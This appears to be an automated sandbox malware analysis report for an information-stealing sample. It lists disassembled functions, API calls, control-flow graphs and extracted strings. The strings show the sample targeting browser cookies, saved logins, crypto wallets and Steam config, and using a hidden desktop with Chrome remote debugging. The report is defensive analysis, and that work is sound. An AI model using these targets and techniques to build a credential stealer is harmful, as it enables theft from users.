                                                                                                                                                                                                                                                                                • String ID: --remote-debugging-port=9223 --profile-directory="$Brave$C:\ProgramData\$CURRENT$Cookies$History$IndexedDB$Local Extension Settings$Login Data$Network$Opera$Opera Crypto$Opera GX$Sync Extension Settings$Wallets$Web Data$\BraveWallet\Preferences$_0.indexeddb.leveldb$_cookies.db$_formhistory.db$_history.db$_key4.db$_logins.json$_webdata.db$chrome-extension_$cookies.sqlite$formhistory.sqlite$places.sqlite
                                                                                                                                                                                                                                                                                • API String ID: 664854069-3644845557
                                                                                                                                                                                                                                                                                • Opcode ID: 8c4c13cee421c7050bc34002db25b6abb8c2bc4e772ac01028f81aeeca01f54a
                                                                                                                                                                                                                                                                                • Instruction ID: 4855d12272032d1875a7082c41d92aaf51c32be0ad940928e656d1a7aac375ca
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c4c13cee421c7050bc34002db25b6abb8c2bc4e772ac01028f81aeeca01f54a
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0FB2A331A006199BCB10EFA1CD95AEEB779BF48304F40419EF8056B192DF78AEC5CB95
                                                                                                                                                                                                                                                                                Function 00413FF0 Relevance: 68.9, APIs: 31, Strings: 8, Instructions: 667stringfileCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                control_flow_graph 2248 413ff0-41405d call 41e9b0 wsprintfA FindFirstFileA memset * 2 2251 4146b1-4146d7 call 410230 * 4 2248->2251 2252 414063-414081 2248->2252 2279 4146da-4146e2 call 410230 2251->2279 2253 4140ae-4140e2 call 402400 2252->2253 2260 414100 2253->2260 2261 4140e4-4140ef strlen 2253->2261 2263 414102-414111 2260->2263 2261->2263 2265 414150-414154 2263->2265 2266 414113-414120 2263->2266 2267 414245-414251 2265->2267 2268 41415a-41418e call 402400 2265->2268 2270 414122 2266->2270 2271 414128-414135 memcmp 2266->2271 2274 414253-414265 2267->2274 2275 414299-41429b 2267->2275 2287 414190-4141a1 strlen 2268->2287 2288 4141a3 2268->2288 2270->2271 2271->2268 2276 414137-414139 2271->2276 2280 414290-414296 ??3@YAXPAX@Z 2274->2280 2281 414267-414269 2274->2281 2282 4142a1-4142d6 wsprintfA StrCmpCA 2275->2282 2283 414090-4140a8 FindNextFileA 2275->2283 2276->2268 2277 41413b-41413d 2276->2277 2277->2267 2286 414143 2277->2286 2279->2251 2280->2275 2291 4146e4-41474f _invalid_parameter_noinfo_noreturn call 410530 * 2 GetLogicalDriveStringsA 2281->2291 2292 41426f-414274 2281->2292 2284 4142d8-4142ed 2282->2284 2285 4142ef-414306 2282->2285 2283->2253 2289 4146a8-4146ab FindClose 2283->2289 2303 414309-414335 memset lstrcatA 2284->2303 2285->2303 2286->2268 2293 4141a5-4141b4 2287->2293 2288->2293 2289->2251 2335 414755-414785 2291->2335 2336 414a0e-414a68 call 410230 * 8 2291->2336 2292->2291 2295 41427a-41427f 2292->2295 2299 4141e0-4141e7 2293->2299 2300 4141b6-4141c3 2293->2300 2295->2291 2301 414285-414288 2295->2301 2307 4141e9-4141ec 2299->2307 2308 4141ef-4141fd 2299->2308 2304 4141c5 2300->2304 2305 4141cb-4141de memcmp 2300->2305 2301->2291 2306 41428e 2301->2306 2309 414340-41434a strtok_s 2303->2309 2304->2305 2305->2299 2305->2308 2306->2280 2307->2308 2308->2267 2311 4141ff-414211 2308->2311 2314 414370-41439a memset lstrcatA 2309->2314 2315 41434c-41435e 2309->2315 2312 414213-414215 2311->2312 2313 41423c-414242 ??3@YAXPAX@Z 2311->2313 2312->2291 2318 41421b-414220 2312->2318 2313->2267 2319 4143c8-4143d2 strtok_s 2314->2319 2321 4145a0-4145a7 2315->2321 2329 414364-41436c 2315->2329 2318->2291 2320 414226-41422b 2318->2320 2319->2321 2322 4143d8-4143e2 PathMatchSpecA 2319->2322 2320->2291 2326 414231-414234 2320->2326 2321->2283 2324 4145ad-4145b9 2321->2324 2327 4143e4-4144b9 call 4101c0 call 410340 call 4102e0 call 410340 call 4113b0 call 4102e0 call 410290 call 410230 * 5 call 410530 DeleteFileA call 410530 CopyFileA call 410530 call 411b80 call 41e900 2322->2327 2328 4143bd-4143c6 2322->2328 2324->2289 2330 4145bf-4145c6 2324->2330 2326->2291 2332 41423a 2326->2332 2419 4143a0-4143b7 call 410530 DeleteFileA call 410230 2327->2419 2420 4144bf-4144ce 2327->2420 2328->2319 2329->2309 2330->2283 2334 4145cc-41469b call 410200 * 4 call 413ff0 2330->2334 2332->2313 2375 4146a0-4146a3 2334->2375 2339 414790-414900 memset GetDriveTypeA call 410530 call 4119b0 lstrcpyA call 410530 * 3 call 410200 * 4 call 413ff0 lstrlenA 2335->2339 2409 414906 2339->2409 2375->2283 2409->2336 2419->2328 2420->2279 2421 4144d4-4144f0 call 410200 call 4076b0 2420->2421 2429 4144f5-4144fc 2421->2429 2430 414502-414592 call 4101c0 call 410200 * 4 call 413e50 call 410230 2429->2430 2431 414597-41459e call 410230 2429->2431 2430->2431 2431->2321
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00414012
                                                                                                                                                                                                                                                                                • FindFirstFileA.KERNEL32(?,?,-000000C0,-000000CC,-000000D8), ref: 00414023
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00414039
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0041404F
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77735E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 004140E5
                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(?,00000000,00000000), ref: 0041412B
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 00414197
                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002), ref: 004141D4
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002), ref: 0041423D
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: memcmpmemsetstrlen$??3@FileFindFirstmemmovewsprintf
                                                                                                                                                                                                                                                                                • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$%s\%s\%s$%s\*.*$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*$C:\ProgramData\$Files
                                                                                                                                                                                                                                                                                • API String ID: 330858031-1484801792
                                                                                                                                                                                                                                                                                • Opcode ID: 85359c954f35e407cbf01df20d7615a727ed75f97d4295e79f40369c1520ae8c
                                                                                                                                                                                                                                                                                • Instruction ID: 5e360f460fbcca21e162eb574f6fd90f09ecfb201c8315115846ffce7b56cf4e
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 85359c954f35e407cbf01df20d7615a727ed75f97d4295e79f40369c1520ae8c
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB42D471E00618ABDB10DF65CC85BEEB7B4BF58304F00419AF915A7252EB78AAC4CF94
                                                                                                                                                                                                                                                                                Function 00414BD0 Relevance: 49.6, APIs: 22, Strings: 6, Instructions: 553stringfileCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                control_flow_graph 3099 414bd0-414c0b wsprintfA FindFirstFileA 3100 414c11-414c2c 3099->3100 3101 414fa2-414fcb call 410230 * 4 3099->3101 3103 414c6a-414ca0 call 402400 3100->3103 3109 414cc0 3103->3109 3110 414ca2-414cb3 strlen 3103->3110 3111 414cc2-414cd1 3109->3111 3110->3111 3113 414d10-414d14 3111->3113 3114 414cd3-414cda 3111->3114 3119 414e05-414e0e 3113->3119 3120 414d1a-414d4e call 402400 3113->3120 3116 414ce2-414cf5 memcmp 3114->3116 3117 414cdc 3114->3117 3116->3120 3121 414cf7-414cf9 3116->3121 3117->3116 3124 414e10-414e22 3119->3124 3125 414e56-414e58 3119->3125 3135 414d50-414d61 strlen 3120->3135 3136 414d63 3120->3136 3121->3120 3128 414cfb-414cfd 3121->3128 3130 414e24-414e26 3124->3130 3131 414e4d-414e53 ??3@YAXPAX@Z 3124->3131 3126 414c52-414c64 FindNextFileA 3125->3126 3127 414e5e-414eeb call 411250 * 2 lstrcatA * 6 call 4101c0 call 4076b0 3125->3127 3126->3103 3134 414f88-414f9d FindClose call 411250 3126->3134 3172 414ef1-414f83 call 4101c0 call 410200 * 4 call 413e50 call 410230 3127->3172 3173 414c30-414c4d call 411250 * 2 3127->3173 3128->3119 3133 414d03 3128->3133 3137 414e2c-414e31 3130->3137 3138 414fce-415077 _invalid_parameter_noinfo_noreturn RegOpenKeyExA 3130->3138 3131->3125 3133->3120 3134->3101 3142 414d65-414d74 3135->3142 3136->3142 3137->3138 3139 414e37-414e3c 3137->3139 3146 415096-415210 RegCloseKey call 411250 lstrcatA * 2 call 410200 * 4 call 414bd0 call 410200 * 4 call 414bd0 call 410200 * 4 call 414bd0 3138->3146 3147 415079-415090 RegQueryValueExA 3138->3147 3139->3138 3144 414e42-414e45 3139->3144 3148 414da0-414da7 3142->3148 3149 414d76-414d83 3142->3149 3144->3138 3152 414e4b 3144->3152 3217 415215-415390 call 410200 * 4 call 414bd0 call 410200 * 4 call 414bd0 call 410200 * 4 call 414bd0 call 411250 call 410230 * 4 3146->3217 3147->3146 3153 414da9-414dac 3148->3153 3154 414daf-414dbd 3148->3154 3150 414d85 3149->3150 3151 414d8b-414d9e memcmp 3149->3151 3150->3151 3151->3148 3151->3154 3152->3131 3153->3154 3154->3119 3157 414dbf-414dd1 3154->3157 3160 414dd3-414dd5 3157->3160 3161 414dfc-414e02 ??3@YAXPAX@Z 3157->3161 3160->3138 3164 414ddb-414de0 3160->3164 3161->3119 3164->3138 3168 414de6-414deb 3164->3168 3168->3138 3171 414df1-414df4 3168->3171 3171->3138 3176 414dfa 3171->3176 3172->3173 3173->3126 3176->3161
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00414BEE
                                                                                                                                                                                                                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 00414BFF
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77735E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 00414CA9
                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00414CEB
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 00414D57
                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 00414D94
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002,?,?,?,00000001), ref: 00414DFD
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: memcmpstrlen$??3@FileFindFirstmemmovewsprintf
                                                                                                                                                                                                                                                                                • String ID: %s\%s$Soft$Software\Valve\Steam$SteamPath$\Steam\$\config\
                                                                                                                                                                                                                                                                                • API String ID: 3353021899-493467598
                                                                                                                                                                                                                                                                                • Opcode ID: e8913cc1306ead9757348380cdc05cbb35dee01de83e02b5b92843a6cff9921b
                                                                                                                                                                                                                                                                                • Instruction ID: f04b4360dc0817d558250c3cdd1667f1ca9511f4c4837c2270bb77207d21b6f3
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8913cc1306ead9757348380cdc05cbb35dee01de83e02b5b92843a6cff9921b
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1132B531C007589BDF10EF65CD85AEDB778BF58304F00929AF90967152EB78AAC5CB94
                                                                                                                                                                                                                                                                                Function 00407060 Relevance: 44.2, APIs: 19, Strings: 6, Instructions: 448stringsleepCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                control_flow_graph 3364 407060-407087 3365 407096 3364->3365 3366 407089-407094 strlen 3364->3366 3367 407098-40709d 3365->3367 3366->3367 3368 4070d6-4070e8 call 40f390 3367->3368 3369 40709f-4070a2 3367->3369 3379 4070f5 3368->3379 3380 4070ea-4070f3 strlen 3368->3380 3371 4070a4-4070a9 3369->3371 3372 407109-40714a call 402510 memcpy OpenDesktopA 3369->3372 3374 4070b5-4070c0 call 40eca0 3371->3374 3375 4070ab-4070b3 call 402520 3371->3375 3382 40716c-40721f call 407660 call 411550 call 410530 call 4119b0 lstrcpyA call 410230 call 411fa0 3372->3382 3383 40714c-407166 CreateDesktopA 3372->3383 3374->3368 3387 4070c2-4070c8 3374->3387 3375->3387 3385 4070f7-407106 call 406b00 3379->3385 3380->3385 3404 407221-40722a strlen 3382->3404 3405 40722c 3382->3405 3383->3382 3390 4070ca 3387->3390 3391 4070cc-4070d3 3387->3391 3390->3391 3391->3368 3406 40722e-40723f call 402400 3404->3406 3405->3406 3409 407264-40726c call 406fe0 3406->3409 3412 40727b-407283 3409->3412 3413 40726e-407274 3409->3413 3416 407285-407294 3412->3416 3417 4072c8-4072e5 3412->3417 3414 407250-407262 call 411fa0 Sleep 3413->3414 3415 407276-407279 3413->3415 3414->3409 3414->3412 3415->3414 3420 407296-407298 3416->3420 3421 4072bf-4072c5 ??3@YAXPAX@Z 3416->3421 3419 407303-40734c CreateProcessA 3417->3419 3423 4074c2-4074df 3419->3423 3424 407352-40738b Sleep call 410200 3419->3424 3425 40764d-407652 _invalid_parameter_noinfo_noreturn 3420->3425 3426 40729e-4072a3 3420->3426 3421->3417 3428 4074e1-4074e7 strlen 3423->3428 3429 4074ea-40750f call 402400 call 406b00 3423->3429 3432 407390-4073ec call 410200 * 3 call 406bc0 3424->3432 3426->3425 3430 4072a9-4072ae 3426->3430 3428->3429 3441 407511-40751a strlen 3429->3441 3442 40751c-407559 call 406b00 * 2 call 4101c0 3429->3442 3430->3425 3431 4072b4-4072b7 3430->3431 3431->3425 3434 4072bd 3431->3434 3452 4073f2-407412 call 411fa0 3432->3452 3453 40760c-40760f call 412050 3432->3453 3434->3421 3441->3442 3460 40755b 3442->3460 3461 40755e-4075d3 call 4101c0 * 2 call 410200 * 4 call 402910 3442->3461 3463 407420 3452->3463 3464 407414-40741d strlen 3452->3464 3458 407614-40761d CloseDesktop 3453->3458 3462 407622-40764a call 410230 * 4 3458->3462 3460->3461 3507 4075d5-4075e4 3461->3507 3508 407608-40760a 3461->3508 3467 407422-407430 call 402400 3463->3467 3464->3467 3476 407454-40745c call 406fe0 3467->3476 3484 407470-407479 3476->3484 3485 40745e-407464 3476->3485 3491 4072f9-4072fd 3484->3491 3492 40747f-40748e 3484->3492 3488 407440-407452 call 411fa0 Sleep 3485->3488 3489 407466-407469 3485->3489 3488->3476 3488->3484 3489->3488 3491->3419 3491->3458 3495 4072f0-4072f6 ??3@YAXPAX@Z 3492->3495 3496 407494-407496 3492->3496 3495->3491 3496->3425 3499 40749c-4074a1 3496->3499 3499->3425 3502 4074a7-4074ac 3499->3502 3502->3425 3504 4074b2-4074b5 3502->3504 3504->3425 3506 4074bb-4074bd 3504->3506 3506->3495 3509 4075e6-4075e8 3507->3509 3510 4075ff-407605 ??3@YAXPAX@Z 3507->3510 3508->3462 3509->3425 3511 4075ea-4075ef 3509->3511 3510->3508 3511->3425 3512 4075f1-4075f6 3511->3512 3512->3425 3513 4075f8-4075fb 3512->3513 3513->3425 3514 4075fd 3513->3514 3514->3510
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 0040708A
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040ECA0: memcpy.MSVCRT(?,00000010,?,?,?,00000010,00406A4D,00000001,00000000,?,?,00000000,00000000,00000000,?,0040D83E), ref: 0040ECC1
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040ECA0: ??3@YAXPAX@Z.MSVCRT(00000010,?,?,00000010,00406A4D,00000001,00000000,?,?,00000000,00000000,00000000,?,0040D83E,00000000,?), ref: 0040ECF3
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 004070EB
                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(?,ChromeBuildTools,00000104), ref: 00407130
                                                                                                                                                                                                                                                                                • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00407142
                                                                                                                                                                                                                                                                                • CreateDesktopA.USER32 ref: 00407166
                                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(?,00000000,?,OCALAPPDATA,00000000,?,0000001C), ref: 004071BD
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 00407222
                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8,00000000,00000000,?,00000000,?), ref: 0040725B
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: strlen$Desktopmemcpy$??3@CreateOpenSleeplstrcpy
                                                                                                                                                                                                                                                                                • String ID: %s%s"$ChromeBuildTools$D$OCALAPPDATA$_CreateProcess$cookies
                                                                                                                                                                                                                                                                                • API String ID: 509579932-957743217
                                                                                                                                                                                                                                                                                • Opcode ID: 25b604c1d987f4309f2292e5dfc1b2e03b5b8293f16c39f96c9129eb1a5b4d54
                                                                                                                                                                                                                                                                                • Instruction ID: 88d1e3b40fbcb0df37290dc8620aa57b8ac853b7570111a731a950e539c68a8a
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 25b604c1d987f4309f2292e5dfc1b2e03b5b8293f16c39f96c9129eb1a5b4d54
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 69F1F431D046049BDB11EF64CD81BEEB7B0AF45304F00456EF90677292EB79A9C5CB9A
                                                                                                                                                                                                                                                                                Function 00401730 Relevance: 39.5, APIs: 17, Strings: 5, Instructions: 968filestringCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                control_flow_graph 3825 401730-401765 call 4101c0 * 2 3830 401767-40176a 3825->3830 3831 40177a-401782 3825->3831 3832 401784-40178a 3830->3832 3833 40176c-40176e 3830->3833 3834 40178c-4017b8 call 411550 call 4102e0 call 410290 call 410230 * 2 3831->3834 3832->3834 3835 401770-401778 3833->3835 3836 4017bd-4017c4 3833->3836 3834->3836 3835->3834 3838 401834-4018b3 call 4102e0 call 410340 call 4102e0 call 410340 call 4102e0 call 410290 call 410230 * 4 3836->3838 3839 4017c6-40182f call 4102e0 call 410340 call 4102e0 call 410340 call 410290 call 410230 * 3 3836->3839 3880 4018b6-4018df call 410230 call 410530 FindFirstFileA 3838->3880 3839->3880 3889 4021f2-402245 call 410230 * 9 3880->3889 3890 4018e5-4018fd 3880->3890 3926 402248-402260 _invalid_parameter_noinfo_noreturn 3889->3926 3892 401933-401967 call 402400 3890->3892 3897 401980 3892->3897 3898 401969-40197a strlen 3892->3898 3900 401982-401991 3897->3900 3898->3900 3902 4019d0-4019d4 3900->3902 3903 401993-4019a0 3900->3903 3905 401aa7-401ab3 3902->3905 3906 4019da-401a02 call 402400 3902->3906 3907 4019a2 3903->3907 3908 4019a8-4019bb memcmp 3903->3908 3911 401ab5-401ac7 3905->3911 3912 401afb-401afd 3905->3912 3922 401a04-401a15 strlen 3906->3922 3923 401a17 3906->3923 3907->3908 3908->3906 3913 4019bd-4019bf 3908->3913 3916 401af2-401af8 ??3@YAXPAX@Z 3911->3916 3917 401ac9-401acb 3911->3917 3918 401b03-401b16 call 4101c0 3912->3918 3919 40191b-40192d FindNextFileA 3912->3919 3913->3906 3920 4019c1-4019c3 3913->3920 3916->3912 3925 401ad1-401ad6 3917->3925 3917->3926 3943 401eb5-401f4e call 4102e0 call 410340 call 4102e0 call 410340 * 2 call 410290 call 410230 * 5 call 410200 call 411520 3918->3943 3944 401b1c-401be2 call 4102e0 call 410340 call 4102e0 call 410340 * 3 call 4102e0 call 410230 * 6 call 410530 FindFirstFileA 3918->3944 3919->3892 3924 4021c1-4021dd FindClose call 4104e0 * 2 3919->3924 3920->3905 3928 